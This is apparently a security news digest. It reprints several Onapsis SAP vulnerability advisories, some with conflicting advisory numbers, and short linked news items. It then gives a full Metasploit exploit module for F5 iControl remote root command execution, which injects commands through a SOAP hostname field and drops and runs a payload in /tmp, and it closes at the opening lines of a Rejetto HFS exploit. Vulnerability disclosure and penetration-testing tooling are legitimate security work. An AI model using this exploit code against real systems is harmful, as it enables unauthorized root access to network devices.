BOT24

Onapsis Security Advisory 2014-033: SAP Business Warehouse Missing
Authorization Check

1. Impact on Business
=====================

By exploiting this vulnerability an authenticated attacker will be able
to abuse of functionality that should be restricted and can disclose
technical information without having the right access permissions. This
information could be used to perform further attacks over the platform.

Risk Level: Low

2. Advisory Information
=======================

- - Public Release Date: 2014-10-08

- - Subscriber Notification Date: 2014-10-08

- - Last Revised: 2014-08-17

- - Security Advisory ID: ONAPSIS-2013-033

- - Onapsis SVS ID: ONAPSIS-00114

- - Researcher: Nahuel D. Sánchez

- - Initial Base CVSS v2: 3.5 (AV:N/AC:M/AU:S/C:P/I:N/A:N)

3. Vulnerability Information
============================

- - Vendor: SAP

- - Affected Components:

- SAP Netweaver AS ABAP 7.31
(Check SAP Note 1967780 for detailed information on affected releases)

- - Vulnerability Class: Improper Authorization (CWE-285)

- - Remotely Exploitable: Yes

- - Locally Exploitable: No

- - Authentication Required: Yes

- - Detection Module available in Onapsis X1: Yes

- - BizRisk Illustration Module available in Onapsis X1: Yes

- - Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-033

4. Affected Components Description
==================================

SAP NetWeaver Business Warehouse is a platform that provides business
intelligence, analytical, reporting and data warehousing capabilities.
It is often used by companies who run their business on SAP's
operational systems. BW is part of the SAP NetWeaver platform.

5. Vulnerability Details
========================

The RFC function 'RSDU_CCMS_GET_PROFILE_PARAM' does not perform any
authorization check prior to retrieving the profile parameter value.

6. Solution
===========

SAP has released SAP Note 1967780 which provide patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/1967780.

Onapsis strongly recommends SAP customers to download the related
security fixes and apply them to the affected components in order to
reduce business risks.

7. Report Timeline
==================

2014-01-20: Onapsis provides vulnerability information to SAP AG.
2014-01-21: SAP confirms having the information of vulnerability.
2014-06-10: SAP releases security patches.
2014-10-08: Onapsis notifies availability of security advisory.

About Onapsis Research Labs
===========================

Onapsis Research Labs provides the industry analysis of key security
issues that impact business-critical systems and applications.
Delivering frequent and timely security and compliance advisories with
associated risk levels, Onapsis Research Labs combine in-depth knowledge
and experience to deliver technical and business-context with sound
security judgment to the broader information security community.

About Onapsis, Inc.
===================

Onapsis gives organizations the adaptive advantage to succeed in
securing business-critical applications by combining technology,
research and analytics. Onapsis enables every security and compliance
team an adaptive approach to focus on the factors that matter most to
their business ? critical applications that house vital data and run
business processes.

Onapsis provides technology solutions including Onapsis X1, the de-facto
SAP security auditing tool which delivers enterprise vulnerability,
compliance, detection and response capabilities with analytics.
The Onapsis Research Labs provide subject matter expertise that combines
in-depth knowledge and experience to deliver technical and
business-context with sound security judgment. This enables
organizations to efficiently uncover security and compliance gaps and
prioritize the resolution within applications running on SAP platforms.

Onapsis delivers tangible business results including decreased business
risk, highlighted compliance gaps, lower operational security costs and
demonstrable value on investment.
For further information about our solutions, please contact us at
info@onapsis.com and visit our website at www.onapsis.com.

Onapsis Security Advisory 2014-031: SAP Business Objects Information
Disclosure via CORBA

1. Impact on Business
=====================

By exploiting this vulnerability a remote unauthenticated attacker would
be able to obtain information about the system that could be used to
further specialize attacks against the Business Objects platform.

Risk Level: Low

2. Advisory Information
=======================

- - Public Release Date: 2014-10-08

- - Subscriber Notification Date: 2014-10-08

- - Last Revised: 2014-09-17

- - Security Advisory ID: ONAPSIS-2014-031

- - Onapsis SVS ID: ONAPSIS-00091

- - Researcher: Will Vandevanter

- - Initial Base CVSS v2: 3.5 (AV:N/AC:M/AU:S/C:P/I:N/A:N)

3. Vulnerability Information
============================

- - Vendor: SAP

- - Affected Components:

- SAP BussinessObjects Edge 4.0
(Check SAP Note 1998990 for detailed information on affected releases)

- - Vulnerability Class: Improper Authorization (CWE-285)

- - Remotely Exploitable: Yes

- - Locally Exploitable: No

- - Authentication Required: Yes

- - Detection Module available in Onapsis X1: Yes

- - BizRisk Illustration Module available in Onapsis X1: Yes

- - Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-031

4. Affected Components Description
==================================

Business Objects is part of the Business Intelligence platform from SAP.
It has components that provide performance management, planning,
reporting, query and analysis and enterprise information management.

Every Business Objects installation provides a web service to interact
with different platform services.

5. Vulnerability Details
========================

Business Objects CORBA listeners include the ability to run
unauthenticated InfoStore queries via CORBA. Although some authorization
is enforced, it is possible to obtain a considerable amount of
information by making requests to the InfoStore via CORBA.

6. Solution
===========

SAP has released SAP Note 1998990 which provide patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/1998990.

Onapsis strongly recommends SAP customers to download the related
security fixes and apply them to the affected components in order to
reduce business risks.

7. Report Timeline
==================

2014-01-16: Onapsis provides vulnerability information to SAP AG.
2014-01-17: SAP confirms having the information of vulnerability.
2014-06-10: SAP releases security patches.
2014-10-08: Onapsis notifies availability of security advisory.

About Onapsis Research Labs
===========================

Onapsis Research Labs provides the industry analysis of key security
issues that impact business-critical systems and applications.
Delivering frequent and timely security and compliance advisories with
associated risk levels, Onapsis Research Labs combine in-depth knowledge
and experience to deliver technical and business-context with sound
security judgment to the broader information security community.

About Onapsis, Inc.
===================

Onapsis gives organizations the adaptive advantage to succeed in
securing business-critical applications by combining technology,
research and analytics. Onapsis enables every security and compliance
team an adaptive approach to focus on the factors that matter most to
their business ? critical applications that house vital data and run
business processes.

Onapsis provides technology solutions including Onapsis X1, the de-facto
SAP security auditing tool which delivers enterprise vulnerability,
compliance, detection and response capabilities with analytics.
The Onapsis Research Labs provide subject matter expertise that combines
in-depth knowledge and experience to deliver technical and
business-context with sound security judgment. This enables
organizations to efficiently uncover security and compliance gaps and
prioritize the resolution within applications running on SAP platforms.

Onapsis delivers tangible business results including decreased business
risk, highlighted compliance gaps, lower operational security costs and
demonstrable value on investment.
For further information about our solutions, please contact us at
info@onapsis.com and visit our website at www.onapsis.com.

Onapsis Security Advisory 2014-027: SAP HANA Multiple Reflected Cross
Site Scripting Vulnerabilities

1. Impact on Business
=====================

By exploiting this vulnerability a remote unauthenticated attacker would
be able to attack other users of the system.

Risk Level: Medium

2. Advisory Information
=======================

- - Public Release Date: 2014-10-08

- - Subscriber Notification Date: 2014-10-08

- - Last Revised: 2014-09-17

- - Security Advisory ID: ONAPSIS-2014-027

- - Onapsis SVS ID: ONAPSIS-00122, ONAPSIS-00125

- - Researcher: Will Vandevanter

- - Initial Base CVSS v2: 4.3 (AV:N/AC:M/AU:N/C:N/I:P/A:N)

3. Vulnerability Information
============================

- - Vendor: SAP

- - Affected Components:

- HANA Developer Edition ? Release 70 (tested on 1.00.70.00.386119)
(Check SAP Note 2009696 for detailed information on affected releases)

- - Vulnerability Class: Improper Neutralization of Input During Web
Page Generation - Cross-site Scripting (CWE-79)

- - Remotely Exploitable: Yes

- - Locally Exploitable: No

- - Authentication Required: No

- - Detection Module available in Onapsis X1: Yes

- - BizRisk Illustration Module available in Onapsis X1: Yes

- - Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-027

4. Affected Components Description
==================================

SAP HANA is a platform for real-time business. It combines database,
data processing, and application platform capabilities in-memory. The
platform provides libraries for predictive, planning, text processing,
spatial, and business analytics.

5. Vulnerability Details
========================

The SAP HANA Developer Edition contains multiple reflected Cross Site
Scripting Vulnerabilities (XSS) in the democontent area, specifically on
the pages:

/sap/hana/democontent/epm/admin/DataGen.xsjs
/sap/hana/democontent/epm/services/multiply.xsjs

A reflected cross-site scripting attack can be used to non-permanently
deface or modify displayed content from a Web site. Reflected cross-site
scripting can be used to steal another user's authentication
information, such as data relating to their current session. An attacker
who gains access to this data may use it to impersonate the user and
access all information with the same rights as the target user. If an
administrator is impersonated, the security of he application may be
fully compromised.

6. Solution
===========

SAP has released SAP Note 2009696 which provide patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/2009696.

Onapsis strongly recommends SAP customers to download the related
security fixes and apply them to the affected components in order to
reduce business risks.

7. Report Timeline
==================

2014-03-05: Onapsis provides vulnerability information to SAP AG.
2014-03-06: SAP confirms having the information of vulnerability.
2014-05-13: SAP releases security patches.
2014-10-08: Onapsis notifies availability of security advisory.

About Onapsis Research Labs
===========================

Onapsis Research Labs provides the industry analysis of key security
issues that impact business-critical systems and applications.
Delivering frequent and timely security and compliance advisories with
associated risk levels, Onapsis Research Labs combine in-depth knowledge
and experience to deliver technical and business-context with sound
security judgment to the broader information security community.

About Onapsis, Inc.
===================

Onapsis gives organizations the adaptive advantage to succeed in
securing business-critical applications by combining technology,
research and analytics. Onapsis enables every security and compliance
team an adaptive approach to focus on the factors that matter most to
their business ? critical applications that house vital data and run
business processes.

Onapsis provides technology solutions including Onapsis X1, the de-facto
SAP security auditing tool which delivers enterprise vulnerability,
compliance, detection and response capabilities with analytics.
The Onapsis Research Labs provide subject matter expertise that combines
in-depth knowledge and experience to deliver technical and
business-context with sound security judgment. This enables
organizations to efficiently uncover security and compliance gaps and
prioritize the resolution within applications running on SAP platforms.

Onapsis delivers tangible business results including decreased business
risk, highlighted compliance gaps, lower operational security costs and
demonstrable value on investment.
For further information about our solutions, please contact us at
info@onapsis.comand visit our website at www.onapsis.com.

Onapsis Security Advisory 2014-028: SAP HANA Web-based Development
Workbench Code Injection

1. Impact on Business
=====================

By exploiting this vulnerability a remote unauthenticated attacker would
be able to completely compromise the SAP system and any information
processed and stored in that system.

Risk Level: High

2. Advisory Information
=======================

- - Public Release Date: 2014-10-08

- - Subscriber Notification Date: 2014-10-08

- - Last Revised: 2014-09-17

- - Security Advisory ID: ONAPSIS-2013-028

- - Onapsis SVS ID: ONAPSIS-00119

- - Researcher: Will Vandevanter

- - Initial Base CVSS v2: 6.0 (AV:N/AC:M/AU:S/C:P/I:P/A:P)

3. Vulnerability Information
============================

Vendor: SAP

Affected Components:

- HANA Developers Edition
- HANA Versions which include the Developer IDE

(Check SAP Note 2015446 for detailed information on affected releases)

- - Vulnerability Class: Improper Neutralization of Directives in
Dynamically Evaluated Code
? Eval Injection (CWE-95)

- - Remotely Exploitable: Yes

- - Locally Exploitable: No

- - Authentication Required: Yes

- - Detection Module available in Onapsis X1: Yes

- - BizRisk Illustration Module available in Onapsis X1: Yes

- - Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-028

4. Affected Components Description
==================================

SAP HANA is a platform for real-time business. It combines database,
data processing, and application platform capabilities in-memory. The
platform provides libraries for predictive, planning, text processing,
spatial, and business analytics.

5. Vulnerability Details
========================

HANA Developer Edition contains a command injection vulnerability.
Specifically, the page /sap/hana/ide/core/base/server/net.xsjs
contains an eval call that is vulnerable to code injection. This allows
an attacker to run arbitrary XSJS code in the context of the user logged in.

6. Solution
===========

SAP has released SAP Note 2015446 which provide patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/2015446.

Onapsis strongly recommends SAP customers to download the related
security fixes and apply them to the affected components in order to
reduce business risks.

7. Report Timeline
==================

2014-02-25: Onapsis provides vulnerability information to SAP AG.
2014-02-26: SAP confirms having the information of vulnerability.
2014-06-10: SAP releases security patches.
2014-10-08: Onapsis notifies availability of security advisory.

About Onapsis Research Labs
===========================

Onapsis Research Labs provides the industry analysis of key security
issues that impact business-critical systems and applications.
Delivering frequent and timely security and compliance advisories with
associated risk levels, Onapsis Research Labs combine in-depth knowledge
and experience to deliver technical and business-context with sound
security judgment to the broader information security community.

About Onapsis, Inc.
===================

Onapsis gives organizations the adaptive advantage to succeed in
securing business-critical applications by combining technology,
research and analytics. Onapsis enables every security and compliance
team an adaptive approach to focus on the factors that matter most to
their business ? critical applications that house vital data and run
business processes.
Onapsis provides technology solutions including Onapsis X1, the de-facto
SAP security auditing tool which delivers enterprise vulnerability,
compliance, detection and response capabilities with analytics.
The Onapsis Research Labs provide subject matter expertise that combines
in-depth knowledge and experience to deliver technical and
business-context with sound security judgment. This enables
organizations to efficiently uncover security and compliance gaps and
prioritize the resolution within applications running on SAP platforms.
Onapsis delivers tangible business results including decreased business
risk, highlighted compliance gaps, lower operational security costs and
demonstrable value on investment.
For further information about our solutions, please contact us at
info@onapsis.comand visit our website at www.onapsis.com.

Onapsis Security Advisory 2014-020: SAP Business Objects Denial of
Service via CORBA

1. Impact on Business
=====================

By exploiting this vulnerability a remote unauthenticated attacker would
be able to completely shut down the SAP Business Objects remotely.

Risk Level: High

2. Advisory Information
=======================

- - Public Release Date: 2014-10-08

- - Subscriber Notification Date: 2014-10-08

- - Last Revised: 2014-09-17

- - Security Advisory ID: ONAPSIS-2014-030

- - Onapsis SVS ID: ONAPSIS-00108

- - Researcher: Will Vandevanter

- - Initial Base CVSS v2: 7.1 (AV:N/AC:M/AU:N/C:N/I:N/A:C)

3. Vulnerability Information
============================

- - Vendor: SAP

- - Affected Components:

- BussinessObjects Edge 4.0
(Check SAP Note 2001106 for detailed information on affected releases)

- - Vulnerability Class: Improper Authorization (CWE-285)

- - Remotely Exploitable: Yes

- - Locally Exploitable: No

- - Authentication Required: No

- - Detection Module available in Onapsis X1: Yes

- - BizRisk Illustration Module available in Onapsis X1: Yes

- - Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-030

4. Affected Components Description
==================================

Business Objects is part of the Business Intelligence platform from SAP.
It has components that provide performance management, planning,
reporting, query and analysis and enterprise information management.

Every Business Objects installation provides a web service to interact
with different platform services.

5. Vulnerability Details
========================

The CMS CORBA listener includes functions in the OSCAFactory::Session
ORB that allows any user to remotely turn off that Business Objects
server without authentication.

6. Solution
===========

SAP has released SAP Note 2001106 which provide patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/2001106.

Onapsis strongly recommends SAP customers to download the related
security fixes and apply them to the affected components in order to
reduce business risks.

7. Report Timeline
==================

2014-01-16: Onapsis provides vulnerability information to SAP AG.
2014-01-17: SAP confirms having the information of vulnerability.
2014-06-10: SAP releases security patches.
2014-10-08: Onapsis notifies availability of security advisory.

About Onapsis Research Labs
===========================

Onapsis Research Labs provides the industry analysis of key security
issues that impact business-critical systems and applications.
Delivering frequent and timely security and compliance advisories with
associated risk levels, Onapsis Research Labs combine in-depth knowledge
and experience to deliver technical and business-context with sound
security judgment to the broader information security community.

About Onapsis, Inc.
===================

Onapsis gives organizations the adaptive advantage to succeed in
securing business-critical applications by combining technology,
research and analytics. Onapsis enables every security and compliance
team an adaptive approach to focus on the factors that matter most to
their business ? critical applications that house vital data and run
business processes.

Onapsis provides technology solutions including Onapsis X1, the de-facto
SAP security auditing tool which delivers enterprise vulnerability,
compliance, detection and response capabilities with analytics.
The Onapsis Research Labs provide subject matter expertise that combines
in-depth knowledge and experience to deliver technical and
business-context with sound security judgment. This enables
organizations to efficiently uncover security and compliance gaps and
prioritize the resolution within applications running on SAP platforms.

Onapsis delivers tangible business results including decreased business
risk, highlighted compliance gaps, lower operational security costs and
demonstrable value on investment.
For further information about our solutions, please contact us at
info@onapsis.com and visit our website at www.onapsis.com.

Onapsis Security Advisory 2014-032: SAP BusinessObjects Persistent Cross
Site Scripting

1. Impact on Business
=====================

By exploiting this vulnerability a remote unauthenticated attacker would
be able to attack other users of the system.

Risk Level: Medium

2. Advisory Information
=======================

- - Public Release Date: 2014-10-08

- - Subscriber Notification Date: 2014-10-08

- - Last Revised: 2014-09-17

- - Security Advisory ID: ONAPSIS-2013-032

- - Onapsis SVS ID: ONAPSIS-00085

- - Researcher: Will Vandevanter

- - Initial Base CVSS v2: 3.5 (AV:N/AC:M/AU:S/C:N/I:P/A:N)

3. Vulnerability Information
============================

- - Vendor: SAP

- - Affected Components:

* BussinessObjects Edge 4.0
(Check SAP Note 1941562 for detailed information on affected releases)

- - Vulnerability Class: Improper Neutralization of Input During Web
Page Generation - Persistent Cross-site Scripting (CWE-79)

- - Remotely Exploitable: Yes

- - Locally Exploitable: No

- - Authentication Required: Yes

- - Detection Module available in Onapsis X1: Yes

- - BizRisk Illustration Module available in Onapsis X1: Yes

- - Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-032

4. Affected Components Description
==================================

Business Objects is part of the Business Intelligence platform from SAP.
It has components that provide performance management, planning,
reporting, query and analysis and enterprise information management.

Every Business Objects installation provides a web service to interact
with different platform services.

5. Vulnerability Details
========================

BusinessObjects BI "Send to Inbox" functionality can be abused by an
attacker, allowing them to modify displayed application content without
authorization, and to potentially obtain authentication information from
other legitimate users.

6. Solution
===========

SAP has released SAP Note 1941562 which provide patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/1941562.

Onapsis strongly recommends SAP customers to download the related
security fixes and apply them to the affected components in order to
reduce business risks.

7. Report Timeline
==================

2014-01-16: Onapsis provides vulnerability information to SAP AG.
2014-01-17: SAP confirms having the information of vulnerability.
2014-06-10: SAP releases security patches.
2014-10-08: Onapsis notifies availability of security advisory.

About Onapsis Research Labs
===========================

Onapsis Research Labs provides the industry analysis of key security
issues that impact business-critical systems and applications.
Delivering frequent and timely security and compliance advisories with
associated risk levels, Onapsis Research Labs combine in-depth knowledge
and experience to deliver technical and business-context with sound
security judgment to the broader information security community.

About Onapsis, Inc.
===================

Onapsis gives organizations the adaptive advantage to succeed in
securing business-critical applications by combining technology,
research and analytics. Onapsis enables every security and compliance
team an adaptive approach to focus on the factors that matter most to
their business ? critical applications that house vital data and run
business processes.
Onapsis provides technology solutions including Onapsis X1, the de-facto
SAP security auditing tool which delivers enterprise vulnerability,
compliance, detection and response capabilities with analytics.
The Onapsis Research Labs provide subject matter expertise that combines
in-depth knowledge and experience to deliver technical and
business-context with sound security judgment. This enables
organizations to efficiently uncover security and compliance gaps and
prioritize the resolution within applications running on SAP platforms.
Onapsis delivers tangible business results including decreased business
risk, highlighted compliance gaps, lower operational security costs and
demonstrable value on investment.
For further information about our solutions, please contact us at
info@onapsis.com and visit our website at www.onapsis.com.

Onapsis Security Advisory 2014-020: SAP Business Objects Information
Disclosure

1. Impact on Business
=====================

A malicious user can discover information relating to valid users
using a vulnerable Business Objects Enterprise instance. This
information could be used to allow the malicious user to specialize
their attacks against the system.

Risk Level: Medium

2. Advisory Information
=======================

- - Public Release Date: 2014-09-18

- - Subscriber Notification Date: 2014-10-08

- - Last Revised: 2014-09-18

- - Security Advisory ID: ONAPSIS-2014-029

- - Onapsis SVS ID: ONAPSIS-00072

- - Researcher: Will Vandevanter

- - Initial Base CVSS v2: 5.0 (AV:N/AC:L/AU:N/C:P/I:N/A:N)

3. Vulnerability Information
============================

- - Vendor: SAP

- Affected Components:
- BussinessObjects Edge 4.0
- BOXI R2
- BOXI 3.1

(Check SAP Note 2001109 for detailed information on affected releases)

- - Vulnerability Class: Information Exposure Through Timing Discrepancy
(CWE-208)

- - Remotely Exploitable: Yes

- - Locally Exploitable: No

- - Authentication Required: No

- - Detection Module available in Onapsis X1: Yes

- - BizRisk Illustration Module available in Onapsis X1: Yes

- - Original Advisory:
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-029

4. Affected Components Description
==================================

Business Objects is part of the Business Intelligence platform from SAP.
It has components that provide performance management, planning,
reporting, query and analysis and enterprise information management.

Every Business Objects installation provides a web service to interact
with different platform services.

5. Vulnerability Details
========================

The vulnerability could be exploited by sending a web services request
to the Session web service and attempting SecEnterprise authentication.
By timing the replies from the remote server an attacker can identify
existent and non-existent users. Specifically, an authentication attempt
from the remote server using an existing username will cause the server
to take longer to respond than a username that does not exist.

6. Solution
===========

SAP has released SAP Note 2001109 which provide patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/2001109.

Onapsis strongly recommends SAP customers to download the related
security fixes and apply them to the affected components in order to
reduce business risks.

7. Report Timeline
==================

2013-08-29: Onapsis provides vulnerability information to SAP AG.
2013-08-30: SAP confirms having the information of vulnerability.
2014-06-10: SAP releases security patches.
2014-10-08: Onapsis notifies availability of security advisory.

About Onapsis Research Labs
===========================

Onapsis Research Labs provides the industry analysis of key security
issues that impact business-critical systems and applications.
Delivering frequent and timely security and compliance advisories with
associated risk levels, Onapsis Research Labs combine in-depth knowledge
and experience to deliver technical and business-context with sound
security judgment to the broader information security community.

About Onapsis, Inc.
===================

Onapsis gives organizations the adaptive advantage to succeed in
securing business-critical applications by combining technology,
research and analytics. Onapsis enables every security and compliance
team an adaptive approach to focus on the factors that matter most to
their business ? critical applications that house vital data and run
business processes.

Onapsis provides technology solutions including Onapsis X1, the de-facto
SAP security auditing tool which delivers enterprise vulnerability,
compliance, detection and response capabilities with analytics.
The Onapsis Research Labs provide subject matter expertise that combines
in-depth knowledge and experience to deliver technical and
business-context with sound security judgment. This enables
organizations to efficiently uncover security and compliance gaps and
prioritize the resolution within applications running on SAP platforms.

Onapsis delivers tangible business results including decreased business
risk, highlighted compliance gaps, lower operational security costs and
demonstrable value on investment.
For further information about our solutions, please contact us at
info@onapsis.com and visit our website at www.onapsis.com.

Twitter has escalated the battle against the US government's data disclosure policies, and has sued the US Department of Justice (DOJ). Unlike other high-profile tech firms which explicitly agree to governmental restrictions on disclosures via an earlier settlement, Twitter feels that the current restrictions are unconstitutional and should be fought.

more here..........http://windowsitpro.com/paul-thurrotts-wininfo/twitter-sues-doj-open-data-request-disclosures

In the beginning of this week we discovered a security flaw in the famous malware analysis framework „Cuckoo Sandbox“. We disclosed this bug to the developers on the 7th of October 2014. Not even three hours later the patch was verified and the updates were supplied by the developers.
The Cuckoo Sandbox Team already did a short write up to explain the nature of the bug: cuckoosandbox.org/2014-10-07-cuckoo-sandbox-111.html
We will provide a more detailed explanation and a simple proof-of-concept to exploit this bug. We recommend to update to the latest Cuckoo Sandbox version.

more here.........https://blog.gdatasoftware.com/blog/article/cuckoo-sandbox-evasion-poc-available.html

For at least five years the Sednit group has been relentlessly attacking various institutions, most notably in Eastern Europe. The group used several advanced pieces of malware for these targeted attacks, in particular the one we named Win32/Sednit, also known as Sofacy.

We recently came across cases of legitimate financial websites being redirected to a custom exploit kit. Based on our research and on some information provided by the Google Security Team, we were able to establish that it is used by the Sednit group. This is a new strategy for this group which has relied mostly on spear-phishing emails up until now.

In this blog, we will first examine on recent cases of spear-phishing emails using the CVE-2014-1761 Microsoft Word exploit. We will then focus on the exploit kit, which appears to still be in development and testing phase, and briefly describe the actual payload.

more here.........http://www.welivesecurity.com/2014/10/08/sednit-espionage-group-now-using-custom-exploit-kit/

I was working a case a while back and I came across some malware that had time stomping capabilities. There have been numerous posts written on how to use the MFT as a means to determine if time stomping has occurred, so I won't go into too much detail here.

more here.......http://az4n6.blogspot.com/2014/10/timestomp-mft-shenanigans.html

Over the past week Radware’s Emergency Response Team (ERT) detected a new type of SYN flood which is believed to be specially designed to overcome most of today’s security defenses with a TCP-based volume attack. Within a 48-hour period two different targets in two different continents were targeted with this new technique and have experienced very high attack volumes.

more here.............http://blog.radware.com/security/2014/10/tsunami-syn-flood-attack/

Jonathan Hall was trying to help the internet. Earlier this week, the 29-year-old hacker and security consultant revealed that someone had broken into machines running inside several widely used internet services, including Yahoo, WinZip, and Lycos. But he may have gone too far.

Hall—the president of a security firm called Future South Technologies—went out of his way to spotlight a network of compromised computer servers that, he says, are controlled by Romanian hackers. He published his findings on his blog, saying he simply wanted to help these companies clean up a nasty computer problem. But with his aggressive investigation, he may have run afoul of the nation’s anti-hacking law, the Computer Fraud and Abuse Act, or CFAA.

more here.............http://www.wired.com/2014/10/shellshockresearcher/

SPHINCS-256 is a high-security post-quantum stateless hash-based signature scheme that signs hundreds of messages per second on a modern 4-core 3.5GHz Intel CPU. Signatures are 41 KB, public keys are 1 KB, and private keys are 1 KB. SPHINCS-256 is designed to provide long-term 2128 security even against attackers equipped with quantum computers. Unlike most hash-based signature schemes, SPHINCS-256 is stateless, allowing it to be a drop-in replacement for current signature schemes.

more here...........http://sphincs.cr.yp.to/index.html

Cisco Adaptive Security Appliance (ASA) Software is affected by the following vulnerabilities

more here.............http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141008-asa

This week, the Washington Post's editorial board, in a widely circulated call for “compromise” on encryption, proposed that while our data should be off-limits to hackers and other bad actors, “perhaps Apple and Google could invent a kind of secure golden key” so that the good guys could get to it if necessary.

This theoretical “secure golden key” would protect privacy while allowing privileged access in cases of legal or state-security emergency. Kidnappers and terrorists are exposed, and the rest of us are safe. Sounds nice. But this proposal is nonsense, and, given the sensitivity of the issue, highly dangerous. Here’s why.

more here...........https://keybase.io/blog/2014-10-08/the-horror-of-a-secure-golden-key

“What,” asked the speaker. “if Notepad behaved just like you would expect it to, but only for the first hour or so that you used it? What if it began to do different things after that?”

According to Giovanni Vigna, a professor at the University of California in Santa Monica and the head of the Center for CyberSecurity and Seclab there, such possum-like behaviour and long-term thinking represents the future of the malware arms race.

Speaking at IP Expo today, Prof. Vigna outlined scenarios in which an increasingly sophisticated and opaque breed of malicious executable will evolve to ‘mimic’ the behaviour patterns of benign software, in an attempt to avoid wasting its payload behaviour on a sandbox or virtualised environment.

more here.........http://thestack.com/mimicry-in-malware-giovanni-vigna-081014

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})
super(update_info(info,
'Name' => "F5 iControl Remote Root Command Execution",
'Description' => %q{
This module exploits an authenticated remote command execution
vulnerability in the F5 BIGIP iControl API (and likely other
F5 devices).
},
'License' => MSF_LICENSE,
'Author' =>
[
'bperry' # Discovery, Metasploit module
],
'References' =>
[
['CVE', '2014-2928'],
['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html']
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['F5 iControl', {}]
],
'Privileged' => true,
'DisclosureDate' => "Sep 17 2013",
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),
OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),
OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin'])
], self.class)
end

def check
get_hostname = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<n1:get_hostname xmlns:n1="urn:iControl:System/Inet" />
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
}

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
'method' => 'POST',
'data' => get_hostname,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})

res.body =~ /y:string">(.*)<\/return/
hostname = $1
send_cmd("whoami")

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
'method' => 'POST',
'data' => get_hostname,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})

res.body =~ /y:string">(.*)<\/return/
new_hostname = $1

if new_hostname == "root.a.b"
pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<n1:set_hostname xmlns:n1="urn:iControl:System/Inet">
<hostname>#{hostname}</hostname>
</n1:set_hostname>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
}

send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
'method' => 'POST',
'data' => pay,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})

return Exploit::CheckCode::Vulnerable
end

return Exploit::CheckCode::Safe
end

def send_cmd(cmd)
pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<n1:set_hostname xmlns:n1="urn:iControl:System/Inet">
<hostname>`#{cmd}`.a.b</hostname>
</n1:set_hostname>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
}

send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
'method' => 'POST',
'data' => pay,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})
end

def exploit
filename = Rex::Text.rand_text_alpha_lower(5)

print_status('Sending payload in chunks, might take a small bit...')
i = 0
while i < payload.encoded.length
cmd = "echo #{Rex::Text.encode_base64(payload.encoded[i..i+4])}|base64 --decode|tee -a /tmp/#{filename}"
send_cmd(cmd)
i = i + 5
end

print_status('Triggering payload...')

send_cmd("sh /tmp/#{filename}")
end
end

//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info={})
super(update_info(info,
'Name' => "Rejetto HttpFileServer Remote Command Execution",
'Description' => %q{
Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a
poor regex in the file ParserLib.pas. This module exploit the HFS scripting commands by
using '' to bypass the filtering. This module has been tested successfully on HFS 2.3b
over Windows XP SP3, Windows 7 SP1 and Windows 8.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Daniele Linguaglossa <danielelinguaglossa[at]gmail.com>', # orginal discovery
'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # metasploit module
],
'References' =>
[
['CVE', '2014-6287'],
